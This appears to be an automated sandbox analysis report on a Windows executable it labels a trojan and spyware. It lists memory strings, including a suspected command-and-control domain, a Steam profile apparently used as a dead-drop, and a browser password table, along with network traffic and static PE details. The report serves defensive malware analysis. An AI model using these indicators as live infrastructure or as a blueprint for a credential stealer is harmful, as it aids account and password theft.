              Source: oe9KS7ZHUc.exe, 00000000.00000003.1810056487.0000000005CAE000.00000004.00000800.00020000.00000000.sdmp, oe9KS7ZHUc.exe, 00000000.00000003.1809375524.0000000005CA9000.00000004.00000800.00020000.00000000.sdmp, oe9KS7ZHUc.exe, 00000000.00000003.1809487885.0000000005CAE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/a
              Source: oe9KS7ZHUc.exe, oe9KS7ZHUc.exe, 00000000.00000003.1782547365.0000000001478000.00000004.00000020.00020000.00000000.sdmp, oe9KS7ZHUc.exe, 00000000.00000003.1832641498.0000000005CBA000.00000004.00000800.00020000.00000000.sdmp, oe9KS7ZHUc.exe, 00000000.00000003.1913347271.00000000014CA000.00000004.00000020.00020000.00000000.sdmp, oe9KS7ZHUc.exe, 00000000.00000003.1973506829.00000000014CA000.00000004.00000020.00020000.00000000.sdmp, oe9KS7ZHUc.exe, 00000000.00000003.1978228463.0000000001478000.00000004.00000020.00020000.00000000.sdmp, oe9KS7ZHUc.exe, 00000000.00000003.1913981579.00000000014EA000.00000004.00000020.00020000.00000000.sdmp, oe9KS7ZHUc.exe, 00000000.00000003.1760100558.0000000001478000.00000004.00000020.00020000.00000000.sdmp, oe9KS7ZHUc.exe, 00000000.00000003.1977872773.0000000001478000.00000004.00000020.00020000.00000000.sdmp, oe9KS7ZHUc.exe, 00000000.00000003.1760241719.0000000001483000.00000004.00000020.00020000.00000000.sdmp, oe9KS7ZHUc.exe, 00000000.00000003.1832856780.0000000005CBA000.00000004.00000800.00020000.00000000.sdmp, oe9KS7ZHUc.exe, 00000000.00000002.1979790273.00000000014EA000.00000004.00000020.00020000.00000000.sdmp, oe9KS7ZHUc.exe, 00000000.00000003.1914035137.00000000014CA000.00000004.00000020.00020000.00000000.sdmp, oe9KS7ZHUc.exe, 00000000.00000003.1782732973.0000000001478000.00000004.00000020.00020000.00000000.sdmp, oe9KS7ZHUc.exe, 00000000.00000003.1977740044.00000000014EA000.00000004.00000020.00020000.00000000.sdmp, oe9KS7ZHUc.exe, 00000000.00000002.1979674828.0000000001478000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/api
              Source: oe9KS7ZHUc.exe, 00000000.00000003.1782547365.000000000143D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/apiK
              Source: oe9KS7ZHUc.exe, 00000000.00000003.1809375524.0000000005CA9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/api_
              Source: oe9KS7ZHUc.exe, 00000000.00000003.1913981579.00000000014EA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/apil
              Source: oe9KS7ZHUc.exe, 00000000.00000003.1895777813.0000000005CBA000.00000004.00000800.00020000.00000000.sdmp, oe9KS7ZHUc.exe, 00000000.00000003.1859459476.0000000005CAE000.00000004.00000800.00020000.00000000.sdmp, oe9KS7ZHUc.exe, 00000000.00000003.1896239562.0000000005CBB000.00000004.00000800.00020000.00000000.sdmp, oe9KS7ZHUc.exe, 00000000.00000003.1859629844.0000000005CB7000.00000004.00000800.00020000.00000000.sdmp, oe9KS7ZHUc.exe, 00000000.00000003.1859053217.0000000005CAA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/apils
              Source: oe9KS7ZHUc.exe, 00000000.00000003.1782547365.0000000001478000.00000004.00000020.00020000.00000000.sdmp, oe9KS7ZHUc.exe, 00000000.00000002.1979790273.00000000014EA000.00000004.00000020.00020000.00000000.sdmp, oe9KS7ZHUc.exe, 00000000.00000003.1782732973.0000000001478000.00000004.00000020.00020000.00000000.sdmp, oe9KS7ZHUc.exe, 00000000.00000003.1977740044.00000000014EA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/apim
              Source: oe9KS7ZHUc.exe, 00000000.00000003.1760100558.0000000001478000.00000004.00000020.00020000.00000000.sdmp, oe9KS7ZHUc.exe, 00000000.00000003.1760241719.0000000001483000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/apis
              Source: oe9KS7ZHUc.exe, 00000000.00000003.1896190150.00000000014EA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/er
              Source: oe9KS7ZHUc.exe, 00000000.00000003.1896190150.00000000014EA000.00000004.00000020.00020000.00000000.sdmp, oe9KS7ZHUc.exe, 00000000.00000002.1979790273.00000000014EA000.00000004.00000020.00020000.00000000.sdmp, oe9KS7ZHUc.exe, 00000000.00000003.1977740044.00000000014EA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/pi
              Source: oe9KS7ZHUc.exe, 00000000.00000003.1896190150.00000000014EA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/te
              Source: oe9KS7ZHUc.exe, 00000000.00000003.1782547365.0000000001478000.00000004.00000020.00020000.00000000.sdmp, oe9KS7ZHUc.exe, 00000000.00000003.1782732973.0000000001478000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/vo
              Source: oe9KS7ZHUc.exe, 00000000.00000003.1737652932.00000000014BA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.steampowered.com/
              Source: oe9KS7ZHUc.exe, 00000000.00000003.1738865391.0000000001483000.00000004.00000020.00020000.00000000.sdmp, oe9KS7ZHUc.exe, 00000000.00000003.1737652932.00000000014BA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lv.queniujq.cn
              Source: oe9KS7ZHUc.exe, 00000000.00000003.1738865391.0000000001483000.00000004.00000020.00020000.00000000.sdmp, oe9KS7ZHUc.exe, 00000000.00000003.1737652932.00000000014BA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://medal.tv
              Source: oe9KS7ZHUc.exe, 00000000.00000003.1738865391.0000000001483000.00000004.00000020.00020000.00000000.sdmp, oe9KS7ZHUc.exe, 00000000.00000003.1737652932.00000000014BA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://player.vimeo.com
              Source: oe9KS7ZHUc.exe, 00000000.00000003.1738667408.0000000001478000.00000004.00000020.00020000.00000000.sdmp, oe9KS7ZHUc.exe, 00000000.00000003.1782547365.0000000001478000.00000004.00000020.00020000.00000000.sdmp, oe9KS7ZHUc.exe, 00000000.00000003.1760100558.0000000001478000.00000004.00000020.00020000.00000000.sdmp, oe9KS7ZHUc.exe, 00000000.00000003.1760241719.0000000001483000.00000004.00000020.00020000.00000000.sdmp, oe9KS7ZHUc.exe, 00000000.00000003.1738865391.0000000001483000.00000004.00000020.00020000.00000000.sdmp, oe9KS7ZHUc.exe, 00000000.00000003.1782732973.0000000001478000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://recaptcha.ne
              Source: oe9KS7ZHUc.exe, 00000000.00000003.1738865391.0000000001483000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://recaptcha.net
              Source: oe9KS7ZHUc.exe, 00000000.00000003.1738865391.0000000001483000.00000004.00000020.00020000.00000000.sdmp, oe9KS7ZHUc.exe, 00000000.00000003.1737652932.00000000014BA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://recaptcha.net/recaptcha/;
              Source: oe9KS7ZHUc.exe, 00000000.00000003.1738865391.0000000001483000.00000004.00000020.00020000.00000000.sdmp, oe9KS7ZHUc.exe, 00000000.00000003.1737652932.00000000014BA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://s.ytimg.com;
              Source: oe9KS7ZHUc.exe, 00000000.00000003.1738865391.0000000001483000.00000004.00000020.00020000.00000000.sdmp, oe9KS7ZHUc.exe, 00000000.00000003.1737652932.00000000014BA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sketchfab.com
              Source: oe9KS7ZHUc.exe, 00000000.00000003.1738865391.0000000001483000.00000004.00000020.00020000.00000000.sdmp, oe9KS7ZHUc.exe, 00000000.00000003.1737652932.00000000014BA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steam.tv/
              Source: oe9KS7ZHUc.exe, 00000000.00000003.1738865391.0000000001483000.00000004.00000020.00020000.00000000.sdmp, oe9KS7ZHUc.exe, 00000000.00000003.1737652932.00000000014BA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steambroadcast-test.akamaized.net
              Source: oe9KS7ZHUc.exe, 00000000.00000003.1738865391.0000000001483000.00000004.00000020.00020000.00000000.sdmp, oe9KS7ZHUc.exe, 00000000.00000003.1737652932.00000000014BA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steambroadcast.akamaized.net
              Source: oe9KS7ZHUc.exe, 00000000.00000003.1738865391.0000000001483000.00000004.00000020.00020000.00000000.sdmp, oe9KS7ZHUc.exe, 00000000.00000003.1737652932.00000000014BA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steambroadcastchat.akamaized.net
              Source: oe9KS7ZHUc.exe, 00000000.00000003.1737652932.00000000014C1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/
              Source: oe9KS7ZHUc.exe, 00000000.00000003.1760037666.00000000014C1000.00000004.00000020.00020000.00000000.sdmp, oe9KS7ZHUc.exe, 00000000.00000003.1737159252.00000000014CA000.00000004.00000020.00020000.00000000.sdmp, oe9KS7ZHUc.exe, 00000000.00000003.1737652932.00000000014C1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/?subsection=broadcasts
              Source: oe9KS7ZHUc.exe, 00000000.00000003.1782547365.0000000001442000.00000004.00000020.00020000.00000000.sdmp, oe9KS7ZHUc.exe, 00000000.00000003.1737835610.0000000001442000.00000004.00000020.00020000.00000000.sdmp, oe9KS7ZHUc.exe, 00000000.00000003.1760100558.0000000001442000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/Zf
              Source: oe9KS7ZHUc.exe, 00000000.00000003.1760037666.00000000014C1000.00000004.00000020.00020000.00000000.sdmp, oe9KS7ZHUc.exe, 00000000.00000003.1737159252.00000000014CA000.00000004.00000020.00020000.00000000.sdmp, oe9KS7ZHUc.exe, 00000000.00000003.1737652932.00000000014C1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/discussions/
              Source: oe9KS7ZHUc.exe, 00000000.00000003.1760037666.00000000014C1000.00000004.00000020.00020000.00000000.sdmp, oe9KS7ZHUc.exe, 00000000.00000003.1737652932.00000000014BA000.00000004.00000020.00020000.00000000.sdmp, oe9KS7ZHUc.exe, 00000000.00000003.1737652932.00000000014C1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.org
              Source: oe9KS7ZHUc.exe, 00000000.00000003.1737652932.00000000014C1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/login/home/?goto=profiles%2F76561199724331900
              Source: oe9KS7ZHUc.exe, 00000000.00000003.1760037666.00000000014C1000.00000004.00000020.00020000.00000000.sdmp, oe9KS7ZHUc.exe, 00000000.00000003.1737159252.00000000014CA000.00000004.00000020.00020000.00000000.sdmp, oe9KS7ZHUc.exe, 00000000.00000003.1737652932.00000000014C1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/market/
              Source: oe9KS7ZHUc.exe, 00000000.00000003.1760037666.00000000014C1000.00000004.00000020.00020000.00000000.sdmp, oe9KS7ZHUc.exe, 00000000.00000003.1737159252.00000000014CA000.00000004.00000020.00020000.00000000.sdmp, oe9KS7ZHUc.exe, 00000000.00000003.1737652932.00000000014C1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/my/wishlist/
              Source: oe9KS7ZHUc.exe, 00000000.00000003.1737652932.00000000014BA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/p
              Source: oe9KS7ZHUc.exe, 00000000.00000003.1782547365.0000000001442000.00000004.00000020.00020000.00000000.sdmp, oe9KS7ZHUc.exe, 00000000.00000003.1737835610.0000000001442000.00000004.00000020.00020000.00000000.sdmp, oe9KS7ZHUc.exe, 00000000.00000003.1760100558.0000000001442000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199724331900
              Source: oe9KS7ZHUc.exe, 00000000.00000003.1760037666.00000000014C1000.00000004.00000020.00020000.00000000.sdmp, oe9KS7ZHUc.exe, 00000000.00000003.1737835610.000000000143C000.00000004.00000020.00020000.00000000.sdmp, oe9KS7ZHUc.exe, 00000000.00000003.1737159252.00000000014CA000.00000004.00000020.00020000.00000000.sdmp, oe9KS7ZHUc.exe, 00000000.00000003.1737652932.00000000014BA000.00000004.00000020.00020000.00000000.sdmp, oe9KS7ZHUc.exe, 00000000.00000003.1737652932.00000000014C1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199724331900/badges
              Source: oe9KS7ZHUc.exe, 00000000.00000003.1760037666.00000000014C1000.00000004.00000020.00020000.00000000.sdmp, oe9KS7ZHUc.exe, 00000000.00000003.1737652932.00000000014BA000.00000004.00000020.00020000.00000000.sdmp, oe9KS7ZHUc.exe, 00000000.00000003.1737652932.00000000014C1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199724331900/inventory/
              Source: oe9KS7ZHUc.exe, 00000000.00000003.1760197173.0000000001469000.00000004.00000020.00020000.00000000.sdmp, oe9KS7ZHUc.exe, 00000000.00000003.1738667408.0000000001469000.00000004.00000020.00020000.00000000.sdmp, oe9KS7ZHUc.exe, 00000000.00000003.1760100558.0000000001467000.00000004.00000020.00020000.00000000.sdmp, oe9KS7ZHUc.exe, 00000000.00000003.1737835610.0000000001467000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199724331900D
              Source: oe9KS7ZHUc.exe, 00000000.00000003.1782732973.0000000001469000.00000004.00000020.00020000.00000000.sdmp, oe9KS7ZHUc.exe, 00000000.00000003.1782547365.0000000001467000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/7656119972433190D
              Source: oe9KS7ZHUc.exe, 00000000.00000003.1760037666.00000000014C1000.00000004.00000020.00020000.00000000.sdmp, oe9KS7ZHUc.exe, 00000000.00000003.1737159252.00000000014CA000.00000004.00000020.00020000.00000000.sdmp, oe9KS7ZHUc.exe, 00000000.00000003.1737652932.00000000014C1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/workshop/
              Source: oe9KS7ZHUc.exe, 00000000.00000003.1737652932.00000000014C1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/
              Source: oe9KS7ZHUc.exe, 00000000.00000003.1738667408.0000000001478000.00000004.00000020.00020000.00000000.sdmp, oe9KS7ZHUc.exe, 00000000.00000003.1738865391.0000000001483000.00000004.00000020.00020000.00000000.sdmp, oe9KS7ZHUc.exe, 00000000.00000003.1737652932.00000000014BA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/;
              Source: oe9KS7ZHUc.exe, 00000000.00000003.1738667408.0000000001478000.00000004.00000020.00020000.00000000.sdmp, oe9KS7ZHUc.exe, 00000000.00000003.1738865391.0000000001483000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/;Persistent-AuthWWW-AuthenticateVarysteamCountry=US%7C185ce35c568ebbb
              Source: oe9KS7ZHUc.exe, 00000000.00000003.1737652932.00000000014C1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/about/
              Source: oe9KS7ZHUc.exe, 00000000.00000003.1760037666.00000000014C1000.00000004.00000020.00020000.00000000.sdmp, oe9KS7ZHUc.exe, 00000000.00000003.1737159252.00000000014CA000.00000004.00000020.00020000.00000000.sdmp, oe9KS7ZHUc.exe, 00000000.00000003.1737652932.00000000014C1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/explore/
              Source: oe9KS7ZHUc.exe, 00000000.00000003.1760037666.00000000014C1000.00000004.00000020.00020000.00000000.sdmp, oe9KS7ZHUc.exe, 00000000.00000003.1737652932.00000000014BA000.00000004.00000020.00020000.00000000.sdmp, oe9KS7ZHUc.exe, 00000000.00000003.1737652932.00000000014C1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/legal/
              Source: oe9KS7ZHUc.exe, 00000000.00000003.1760037666.00000000014C1000.00000004.00000020.00020000.00000000.sdmp, oe9KS7ZHUc.exe, 00000000.00000003.1737159252.00000000014CA000.00000004.00000020.00020000.00000000.sdmp, oe9KS7ZHUc.exe, 00000000.00000003.1737652932.00000000014C1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/mobile
              Source: oe9KS7ZHUc.exe, 00000000.00000003.1760037666.00000000014C1000.00000004.00000020.00020000.00000000.sdmp, oe9KS7ZHUc.exe, 00000000.00000003.1737159252.00000000014CA000.00000004.00000020.00020000.00000000.sdmp, oe9KS7ZHUc.exe, 00000000.00000003.1737652932.00000000014C1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/news/
              Source: oe9KS7ZHUc.exe, 00000000.00000003.1760037666.00000000014C1000.00000004.00000020.00020000.00000000.sdmp, oe9KS7ZHUc.exe, 00000000.00000003.1737159252.00000000014CA000.00000004.00000020.00020000.00000000.sdmp, oe9KS7ZHUc.exe, 00000000.00000003.1737652932.00000000014C1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/points/shop/
              Source: oe9KS7ZHUc.exe, 00000000.00000003.1760037666.00000000014C1000.00000004.00000020.00020000.00000000.sdmp, oe9KS7ZHUc.exe, 00000000.00000003.1737159252.00000000014CA000.00000004.00000020.00020000.00000000.sdmp, oe9KS7ZHUc.exe, 00000000.00000003.1737652932.00000000014C1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/privacy_agreement/
              Source: oe9KS7ZHUc.exe, 00000000.00000003.1760037666.00000000014C1000.00000004.00000020.00020000.00000000.sdmp, oe9KS7ZHUc.exe, 00000000.00000003.1737159252.00000000014CA000.00000004.00000020.00020000.00000000.sdmp, oe9KS7ZHUc.exe, 00000000.00000003.1737652932.00000000014C1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/stats/
              Source: oe9KS7ZHUc.exe, 00000000.00000003.1760037666.00000000014C1000.00000004.00000020.00020000.00000000.sdmp, oe9KS7ZHUc.exe, 00000000.00000003.1737159252.00000000014CA000.00000004.00000020.00020000.00000000.sdmp, oe9KS7ZHUc.exe, 00000000.00000003.1737652932.00000000014C1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/steam_refunds/
              Source: oe9KS7ZHUc.exe, 00000000.00000003.1760037666.00000000014C1000.00000004.00000020.00020000.00000000.sdmp, oe9KS7ZHUc.exe, 00000000.00000003.1737159252.00000000014CA000.00000004.00000020.00020000.00000000.sdmp, oe9KS7ZHUc.exe, 00000000.00000003.1737652932.00000000014C1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/subscriber_agreement/
              Source: oe9KS7ZHUc.exe, 00000000.00000003.1785174466.0000000005D04000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.microsof
              Source: oe9KS7ZHUc.exe, 00000000.00000003.1834247835.0000000005DC1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
              Source: oe9KS7ZHUc.exe, 00000000.00000003.1834247835.0000000005DC1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
              Source: oe9KS7ZHUc.exe, 00000000.00000003.1785251694.0000000005CFB000.00000004.00000800.00020000.00000000.sdmp, oe9KS7ZHUc.exe, 00000000.00000003.1785174466.0000000005D02000.00000004.00000800.00020000.00000000.sdmp, oe9KS7ZHUc.exe, 00000000.00000003.1809338619.0000000005CFB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016
              Source: oe9KS7ZHUc.exe, 00000000.00000003.1785251694.0000000005CD6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples
              Source: oe9KS7ZHUc.exe, 00000000.00000003.1785251694.0000000005CFB000.00000004.00000800.00020000.00000000.sdmp, oe9KS7ZHUc.exe, 00000000.00000003.1785174466.0000000005D02000.00000004.00000800.00020000.00000000.sdmp, oe9KS7ZHUc.exe, 00000000.00000003.1809338619.0000000005CFB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17
              Source: oe9KS7ZHUc.exe, 00000000.00000003.1785251694.0000000005CD6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install
              Source: oe9KS7ZHUc.exe, 00000000.00000003.1859053217.0000000005CAA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_7548d4575af019e4c148ccf1a78112802e66a0816a72fc94
              Source: oe9KS7ZHUc.exe, 00000000.00000003.1783584612.0000000005CED000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
              Source: oe9KS7ZHUc.exe, 00000000.00000003.1859053217.0000000005CAA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.expedia.com/?locale=en_US&siteid=1&semcid=US.UB.ADMARKETPLACE.GT-C-EN.HOTEL&SEMDTL=a1219
              Source: oe9KS7ZHUc.exe, 00000000.00000003.1738865391.0000000001483000.00000004.00000020.00020000.00000000.sdmp, oe9KS7ZHUc.exe, 00000000.00000003.1737652932.00000000014BA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com
              Source: oe9KS7ZHUc.exe, 00000000.00000003.1783584612.0000000005CED000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
              Source: oe9KS7ZHUc.exe, 00000000.00000003.1737652932.00000000014BA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/recaptcha/
              Source: oe9KS7ZHUc.exe, 00000000.00000003.1738865391.0000000001483000.00000004.00000020.00020000.00000000.sdmp, oe9KS7ZHUc.exe, 00000000.00000003.1737652932.00000000014BA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.cn/recaptcha/
              Source: oe9KS7ZHUc.exe, 00000000.00000003.1738865391.0000000001483000.00000004.00000020.00020000.00000000.sdmp, oe9KS7ZHUc.exe, 00000000.00000003.1737652932.00000000014BA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com/recaptcha/
              Source: oe9KS7ZHUc.exe, 00000000.00000003.1834247835.0000000005DC1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.VsJpOAWrHqB2
              Source: oe9KS7ZHUc.exe, 00000000.00000003.1834247835.0000000005DC1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.n0g9CLHwD9nR
              Source: oe9KS7ZHUc.exe, 00000000.00000003.1834247835.0000000005DC1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
              Source: oe9KS7ZHUc.exe, 00000000.00000003.1834247835.0000000005DC1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
              Source: oe9KS7ZHUc.exe, 00000000.00000003.1834247835.0000000005DC1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
              Source: oe9KS7ZHUc.exe, 00000000.00000003.1760037666.00000000014C1000.00000004.00000020.00020000.00000000.sdmp, oe9KS7ZHUc.exe, 00000000.00000003.1737159252.00000000014CA000.00000004.00000020.00020000.00000000.sdmp, oe9KS7ZHUc.exe, 00000000.00000003.1737652932.00000000014C1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedback
              Source: oe9KS7ZHUc.exe, 00000000.00000003.1738865391.0000000001483000.00000004.00000020.00020000.00000000.sdmp, oe9KS7ZHUc.exe, 00000000.00000003.1737652932.00000000014BA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com
              Source: oe9KS7ZHUc.exe, 00000000.00000003.1738865391.0000000001483000.00000004.00000020.00020000.00000000.sdmp, oe9KS7ZHUc.exe, 00000000.00000003.1737652932.00000000014BA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/
              Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49733
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49732
              Source: unknownNetwork traffic detected: HTTP traffic on port 49734 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49731
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49742
              Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49742 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49745 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49738
              Source: unknownNetwork traffic detected: HTTP traffic on port 49736 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49735 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49736
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49735
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49734
              Source: unknownNetwork traffic detected: HTTP traffic on port 49738 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49745
              Source: unknownHTTPS traffic detected: 23.55.153.106:443 -> 192.168.2.4:49731 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.66.86:443 -> 192.168.2.4:49732 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.66.86:443 -> 192.168.2.4:49733 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.66.86:443 -> 192.168.2.4:49734 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.66.86:443 -> 192.168.2.4:49735 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.66.86:443 -> 192.168.2.4:49736 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.66.86:443 -> 192.168.2.4:49738 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.66.86:443 -> 192.168.2.4:49742 version: TLS 1.2

              System Summary

              barindex
              Source: oe9KS7ZHUc.exeStatic PE information: section name:
              Source: oe9KS7ZHUc.exeStatic PE information: section name: .rsrc
              Source: oe9KS7ZHUc.exeStatic PE information: section name: .idata
              Source: C:\Users\user\Desktop\oe9KS7ZHUc.exeCode function: 0_3_05CBC8C70_3_05CBC8C7
              Source: C:\Users\user\Desktop\oe9KS7ZHUc.exeCode function: 0_3_05CBC8C70_3_05CBC8C7
              Source: oe9KS7ZHUc.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
              Source: oe9KS7ZHUc.exeStatic PE information: Section: ZLIB complexity 0.9995978860294118
              Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@1/0@11/2
              Source: C:\Users\user\Desktop\oe9KS7ZHUc.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
              Source: oe9KS7ZHUc.exe, 00000000.00000003.1785251694.0000000005CBC000.00000004.00000800.00020000.00000000.sdmp, oe9KS7ZHUc.exe, 00000000.00000003.1784434233.0000000005CDA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
              Source: oe9KS7ZHUc.exeVirustotal: Detection: 54%
              Source: oe9KS7ZHUc.exeReversingLabs: Detection: 52%
              Source: oe9KS7ZHUc.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
              Source: C:\Users\user\Desktop\oe9KS7ZHUc.exeFile read: C:\Users\user\Desktop\oe9KS7ZHUc.exeJump to behavior
              Source: C:\Users\user\Desktop\oe9KS7ZHUc.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Users\user\Desktop\oe9KS7ZHUc.exeSection loaded: winmm.dllJump to behavior
              Source: C:\Users\user\Desktop\oe9KS7ZHUc.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Users\user\Desktop\oe9KS7ZHUc.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Users\user\Desktop\oe9KS7ZHUc.exeSection loaded: winhttp.dllJump to behavior
